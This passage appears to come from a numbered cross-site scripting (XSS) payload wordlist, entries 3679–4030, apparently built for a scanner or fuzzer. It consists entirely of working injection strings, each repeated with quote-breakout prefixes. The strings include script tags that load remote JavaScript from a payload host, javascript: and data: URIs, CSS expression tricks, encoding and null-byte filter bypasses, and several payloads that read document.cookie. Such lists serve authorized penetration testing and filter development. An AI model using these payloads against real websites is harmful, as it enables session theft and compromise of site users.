  3679. "><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  3680. '><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  3681. <SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  3682. "><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  3683. '><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  3684. <SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  3685. "><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  3686. '><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  3687. <SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  3688. "><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  3689. '><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  3690. <<SCRIPT>alert("X");//<</SCRIPT>
  3691. "><<SCRIPT>alert("X");//<</SCRIPT>
  3692. '><<SCRIPT>alert("X");//<</SCRIPT>
  3693. <SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >
  3694. "><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >
  3695. '><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >
  3696. <SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >
  3697. "><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >
  3698. '><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >
  3699. <SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>
  3700. "><SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>
  3701. '><SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>
  3702. <IMG SRC="javascript:alert('X')"
  3703. "><IMG SRC="javascript:alert('X')"
  3704. '><IMG SRC="javascript:alert('X')"
  3705. </TITLE><SCRIPT>alert("X");</SCRIPT>
  3706. "></TITLE><SCRIPT>alert("X");</SCRIPT>
  3707. '></TITLE><SCRIPT>alert("X");</SCRIPT>
  3708. <INPUT TYPE="IMAGE" SRC="javascript:alert('X');">
  3709. "><INPUT TYPE="IMAGE" SRC="javascript:alert('X');">
  3710. '><INPUT TYPE="IMAGE" SRC="javascript:alert('X');">
  3711. <BODY BACKGROUND="javascript:alert('X')">
  3712. "><BODY BACKGROUND="javascript:alert('X')">
  3713. '><BODY BACKGROUND="javascript:alert('X')">
  3714. <IMG DYNSRC="javascript:alert('X')">
  3715. "><IMG DYNSRC="javascript:alert('X')">
  3716. '><IMG DYNSRC="javascript:alert('X')">
  3717. <IMG LOWSRC="javascript:alert('X')">
  3718. "><IMG LOWSRC="javascript:alert('X')">
  3719. '><IMG LOWSRC="javascript:alert('X')">
  3720. <STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X</br>
  3721. "><STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X</br>
  3722. '><STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X</br>
  3723. <IMG SRC='vbscript:msgbox("X")'>
  3724. "><IMG SRC='vbscript:msgbox("X")'>
  3725. '><IMG SRC='vbscript:msgbox("X")'>
  3726. <IMG SRC="livescript:[code]">
  3727. "><IMG SRC="livescript:[code]">
  3728. '><IMG SRC="livescript:[code]">
  3729. <BODY ONLOAD=alert('X')>
  3730. "><BODY ONLOAD=alert('X')>
  3731. '><BODY ONLOAD=alert('X')>
  3732. <BGSOUND SRC="javascript:alert('X');">
  3733. "><BGSOUND SRC="javascript:alert('X');">
  3734. '><BGSOUND SRC="javascript:alert('X');">
  3735. <BR SIZE="&{alert('X')}">
  3736. "><BR SIZE="&{alert('X')}">
  3737. '><BR SIZE="&{alert('X')}">
  3738. <LINK REL="stylesheet" HREF="javascript:alert('X');">
  3739. "><LINK REL="stylesheet" HREF="javascript:alert('X');">
  3740. '><LINK REL="stylesheet" HREF="javascript:alert('X');">
  3741. <STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>
  3742. "><STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>
  3743. '><STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>
  3744. <STYLE>@im\port'\ja\vasc\ript:alert("X")';</STYLE>
  3745. "><STYLE>@im\port'\ja\vasc\ript:alert("X")';</STYLE>
  3746. '><STYLE>@im\port'\ja\vasc\ript:alert("X")';</STYLE>
  3747. <IMG STYLE="X:expr/*X*/ession(alert('X'))">
  3748. "><IMG STYLE="X:expr/*X*/ession(alert('X'))">
  3749. '><IMG STYLE="X:expr/*X*/ession(alert('X'))">
  3750. <STYLE TYPE="text/javascript">alert('X');</STYLE>
  3751. "><STYLE TYPE="text/javascript">alert('X');</STYLE>
  3752. '><STYLE TYPE="text/javascript">alert('X');</STYLE>
  3753. <STYLE>.X{background-image:url("javascript:alert('X')");}</STYLE><A CLASS=X></A>
  3754. "><STYLE>.X{background-image:url("javascript:alert('X')");}</STYLE><A CLASS=X></A>
  3755. '><STYLE>.X{background-image:url("javascript:alert('X')");}</STYLE><A CLASS=X></A>
  3756. "><A CLASS=X></A>
  3757. '><A CLASS=X></A>
  3758. <STYLE type="text/css">BODY{background:url("javascript:alert('X')")}</STYLE>
  3759. "><STYLE type="text/css">BODY{background:url("javascript:alert('X')")}</STYLE>
  3760. '><STYLE type="text/css">BODY{background:url("javascript:alert('X')")}</STYLE>
  3761. <X STYLE="X:expression(alert('X'))">
  3762. "><X STYLE="X:expression(alert('X'))">
  3763. '><X STYLE="X:expression(alert('X'))">
  3764. <X STYLE="behavior: url(X.htc);">
  3765. "><X STYLE="behavior: url(X.htc);">
  3766. '><X STYLE="behavior: url(X.htc);">
  3767. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('X');">
  3768. "><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('X');">
  3769. '><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('X');">
  3770. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  3771. "><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  3772. '><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  3773. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('X');">
  3774. "><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('X');">
  3775. '><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('X');">
  3776. <IFRAME SRC="javascript:alert('X');"></IFRAME>
  3777. "><IFRAME SRC="javascript:alert('X');"></IFRAME>
  3778. '><IFRAME SRC="javascript:alert('X');"></IFRAME>
  3779. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  3780. "><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  3781. '><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  3782. <FRAMESET><FRAME SRC="javascript:alert('X');"></FRAMESET>
  3783. "><FRAMESET><FRAME SRC="javascript:alert('X');"></FRAMESET>
  3784. '><FRAMESET><FRAME SRC="javascript:alert('X');"></FRAMESET>
  3785. <TABLE BACKGROUND="javascript:alert('X')">
  3786. "><TABLE BACKGROUND="javascript:alert('X')">
  3787. '><TABLE BACKGROUND="javascript:alert('X')">
  3788. <TABLE><TD BACKGROUND="javascript:alert('X')">
  3789. "><TABLE><TD BACKGROUND="javascript:alert('X')">
  3790. '><TABLE><TD BACKGROUND="javascript:alert('X')">
  3791. <DIV STYLE="background-image: url(javascript:alert('X'))">
  3792. "><DIV STYLE="background-image: url(javascript:alert('X'))">
  3793. '><DIV STYLE="background-image: url(javascript:alert('X'))">
  3794. <DIV STYLE="background-image: url(&#1;javascript:alert('X'))">
  3795. "><DIV STYLE="background-image: url(&#1;javascript:alert('X'))">
  3796. '><DIV STYLE="background-image: url(&#1;javascript:alert('X'))">
  3797. <DIV STYLE="width: expression(alert('X'));">
  3798. "><DIV STYLE="width: expression(alert('X'));">
  3799. '><DIV STYLE="width: expression(alert('X'));">
  3800. <BASE HREF="javascript:alert('X');//">
  3801. "><BASE HREF="javascript:alert('X');//">
  3802. '><BASE HREF="javascript:alert('X');//">
  3803. <object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>
  3804. "><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>
  3805. '><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>
  3806. <object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>
  3807. "><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>
  3808. '><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>
  3809. <OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>
  3810. "><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>
  3811. '><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>
  3812. <EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  3813. "><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  3814. '><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  3815. <SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>
  3816. "><SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>
  3817. '><SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>
  3818. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>'"-->
  3819. "><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>'"-->
  3820. '><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>'"-->
  3821. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>'"-->
  3822. "><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>'"-->
  3823. '><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>'"-->
  3824. <? echo('<SCR)';echo('IPT>alert("X")</SCRIPT>'); ?>
  3825. "><? echo('<SCR)';echo('IPT>alert("X")</SCRIPT>'); ?>
  3826. '><? echo('<SCR)';echo('IPT>alert("X")</SCRIPT>'); ?>
  3827. Redirect 302 /axaaX.jpg http://127.0.0.1:3555/xss_serve_payloads/X.html
  3828. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('X')</SCRIPT>">
  3829. "><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('X')</SCRIPT>">
  3830. '><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('X')</SCRIPT>">
  3831. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('X');+ADw-/SCRIPT+AD4-
  3832. <A HREF="http://127.0.0.1/">X</A>
  3833. "><A HREF="http://127.0.0.1/">X</A>
  3834. '><A HREF="http://127.0.0.1/">X</A>
  3835. <A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>
  3836. "><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>
  3837. '><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>
  3838. <A HREF="http://0102.0146.0007.00000223/">X</A>
  3839. "><A HREF="http://0102.0146.0007.00000223/">X</A>
  3840. '><A HREF="http://0102.0146.0007.00000223/">X</A>
  3841. <A HREF="htt p://6 6.000146.0x7.147/">X</A>
  3842. "><A HREF="htt p://6 6.000146.0x7.147/">X</A>
  3843. '><A HREF="htt p://6 6.000146.0x7.147/">X</A>
  3844. <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
  3845. "><iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
  3846. '><iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
  3847. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  3848. "><svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  3849. '><svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  3850. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  3851. "><input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  3852. '><input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  3853. <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
  3854. "><sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
  3855. '><sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
  3856. <img/src=`%00` onerror=this.onerror=confirm(1)
  3857. "><img/src=`%00` onerror=this.onerror=confirm(1)
  3858. '><img/src=`%00` onerror=this.onerror=confirm(1)
  3859. <form><isindex formaction="javascript&colon;confirm(1)"
  3860. "><form><isindex formaction="javascript&colon;confirm(1)"
  3861. '><form><isindex formaction="javascript&colon;confirm(1)"
  3862. <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
  3863. "><img src=`%00`&NewLine; onerror=alert(1)&NewLine;
  3864. '><img src=`%00`&NewLine; onerror=alert(1)&NewLine;
  3865. <script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /&Tab;></script>
  3866. "><script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /&Tab;></script>
  3867. '><script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /&Tab;></script>
  3868. <script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /&Tab;></script>
  3869. "><script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /&Tab;></script>
  3870. '><script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /&Tab;></script>
  3871. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  3872. "><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  3873. '><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  3874. <iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  3875. "><iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  3876. '><iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  3877. <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
  3878. "><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
  3879. '><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
  3880. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
  3881. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  3882. "><iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  3883. '><iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  3884. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  3885. "><meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  3886. '><meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  3887. <svg><script xlink:href=data&colon;,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script
  3888. "><svg><script xlink:href=data&colon;,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script
  3889. '><svg><script xlink:href=data&colon;,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script
  3890. <svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'
  3891. "><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'
  3892. '><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'
  3893. <svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'
  3894. "><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'
  3895. '><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'
  3896. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  3897. "><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  3898. '><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  3899. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  3900. "><iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  3901. '><iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  3902. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  3903. "><form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  3904. '><form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  3905. </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
  3906. "></script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
  3907. '></script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
  3908. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  3909. "><img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  3910. '><img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  3911. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  3912. "><form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  3913. '><form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  3914. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a
  3915. "><a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a
  3916. '><a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a
  3917. http://www.keralacyberforce<script .in>alert(document.location)</script
  3918. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  3919. "><a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  3920. '><a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  3921. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  3922. "><img/src=@&#32;&#13; onerror = prompt('&#49;')
  3923. '><img/src=@&#32;&#13; onerror = prompt('&#49;')
  3924. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  3925. "><style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  3926. '><style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  3927. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  3928. "><script ^__^>alert(String.fromCharCode(49))</script ^__^
  3929. '><script ^__^>alert(String.fromCharCode(49))</script ^__^
  3930. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  3931. "></style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  3932. '></style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  3933. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  3934. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  3935. "><form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  3936. '><form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  3937. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  3938. "><script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  3939. '><script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  3940. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  3941. "><iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  3942. '><iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  3943. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  3944. "><a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  3945. '><a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  3946. <script ~~~>alert(0%0)</script ~~~>
  3947. "><script ~~~>alert(0%0)</script ~~~>
  3948. '><script ~~~>alert(0%0)</script ~~~>
  3949. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  3950. "><style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  3951. '><style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  3952. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  3953. "><///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  3954. '><///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  3955. <img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=&Tab;prompt(1)
  3956. "><img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=&Tab;prompt(1)
  3957. '><img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=&Tab;prompt(1)
  3958. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  3959. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  3960. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  3961. "><marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  3962. '><marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  3963. <div/style="width:expression(confirm(1))">X</div>
  3964. "><div/style="width:expression(confirm(1))">X</div>
  3965. '><div/style="width:expression(confirm(1))">X</div> {IE7}
  3966. "><div/style="width:expression(confirm(1))">X</div>
  3967. "><div/style="width:expression(confirm(1))">X</div>
  3968. '><div/style="width:expression(confirm(1))">X</div> {IE7}
  3969. '><div/style="width:expression(confirm(1))">X</div>
  3970. "><div/style="width:expression(confirm(1))">X</div>
  3971. '><div/style="width:expression(confirm(1))">X</div> {IE7}
  3972. <iframe/%00/ src=javaSCRIPT&colon;alert(1)
  3973. "><iframe/%00/ src=javaSCRIPT&colon;alert(1)
  3974. '><iframe/%00/ src=javaSCRIPT&colon;alert(1)
  3975. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  3976. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  3977. //|\\ <script //|\\ src='http://127.0.0.1:3555/xss_serve_payloads/X.js'> //|\\ </script //|\\
  3978. //|\\ <script //|\\ src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'> //|\\ </script //|\\
  3979. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  3980. "></font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  3981. '></font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  3982. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  3983. "><a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  3984. '><a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  3985. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  3986. "></plaintext\></|\><plaintext/onmouseover=prompt(1)
  3987. '></plaintext\></|\><plaintext/onmouseover=prompt(1)
  3988. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;
  3989. "></svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;
  3990. '></svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;
  3991. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  3992. "><a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  3993. '><a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  3994. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  3995. "><div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  3996. '><div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  3997. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  3998. "><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  3999. '><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  4000. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  4001. "><a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  4002. '><a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  4003. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>X</a>
  4004. "><a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>X</a>
  4005. '><a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>X</a>
  4006. <img src="/" =_=" title="onerror='prompt(1)'">
  4007. "><img src="/" =_=" title="onerror='prompt(1)'">
  4008. '><img src="/" =_=" title="onerror='prompt(1)'">
  4009. <%<!--'%><script>alert(1);</script -->
  4010. "><%<!--'%><script>alert(1);</script -->
  4011. '><%<!--'%><script>alert(1);</script -->
  4012. <script src="data:text/javascript,alert(1)"></script>
  4013. "><script src="data:text/javascript,alert(1)"></script>
  4014. '><script src="data:text/javascript,alert(1)"></script>
  4015. <iframe/src \/\/onload = prompt(1)
  4016. "><iframe/src \/\/onload = prompt(1)
  4017. '><iframe/src \/\/onload = prompt(1)
  4018. <iframe/onreadystatechange=alert(1)
  4019. "><iframe/onreadystatechange=alert(1)
  4020. '><iframe/onreadystatechange=alert(1)
  4021. <svg/onload=alert(1)
  4022. "><svg/onload=alert(1)
  4023. '><svg/onload=alert(1)
  4024. <input value=<><iframe/src=javascript:confirm(1)
  4025. "><input value=<><iframe/src=javascript:confirm(1)
  4026. '><input value=<><iframe/src=javascript:confirm(1)
  4027. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  4028. "><input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  4029. '><input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  4030. http://www.<script>alert(1)</script .com
